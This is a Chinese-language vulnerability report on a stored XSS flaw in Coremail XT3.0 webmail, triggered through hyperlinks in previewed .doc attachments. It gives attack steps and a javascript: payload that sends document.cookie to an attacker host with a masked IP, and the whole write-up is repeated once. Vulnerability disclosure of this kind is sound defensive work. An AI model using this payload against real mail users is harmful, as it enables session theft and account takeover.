Coremail一处存储型跨站脚本（有触发条件）

### 简要描述： Coremail一处存储型跨站脚本漏洞，已申请CVE编号：CVE-2015-6942 ### 详细说明： 影响版本：XT3.0 其他版本未测试 测试步骤： 1.首先创建一个带有超链接的doc文档，超链接为"javascript:alert()" [<img src="https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg) 2.创建一封邮件并上传附件，然后发送给需要攻击的用户(可发送给任意用户)。 3.受害者如果在WebMail里打开邮件并在线预览doc文档时，点击超链接，即可执行攻击代码。 [<img src="https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg) 4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可 获取Cookie可以使用此超链接：href="javascript:c=escape(document.cookie);q='http://**.**.**.**/xss/index.htm?ck=';location.href=(q+c)" 这里只是测试获取cookie，用其他方式发送Cookie也可以。 [<img src="https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg" alt="c.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg) 5.访问收信后台即可看到Cookie [<img src="https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png) ### 漏洞证明： 1.首先创建一个带有超链接的doc文档，超链接为"javascript:alert()" [<img src="https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100028d43d7fca1f4b34217f1609e6a21a48e8.jpg) 2.创建一封邮件并上传附件，然后发送给需要攻击的用户(可发送给任意用户)。 3.受害者如果在WebMail里打开邮件并在线预览doc文档时，点击超链接，即可执行攻击代码。 [<img src="https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/16100425824458fd7d009fe099146b673a5266f3.jpg) 4.重新将文档中的超链接换成location.href方式获取Cookie的超连接的即可 获取Cookie可以使用此超链接：href="javascript:c=escape(document.cookie);q='http://**.**.**.**/xss/index.htm?ck=';location.href=(q+c)" 这里只是测试获取cookie，用其他方式发送Cookie也可以。 [<img src="https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg" alt="c.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161007510dda7b8163b650b9c2e812e203598046.jpg) 5.访问收信后台即可看到Cookie [<img src="https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/161014128039c38918bc5c4ab0768c4365fbeaca.png)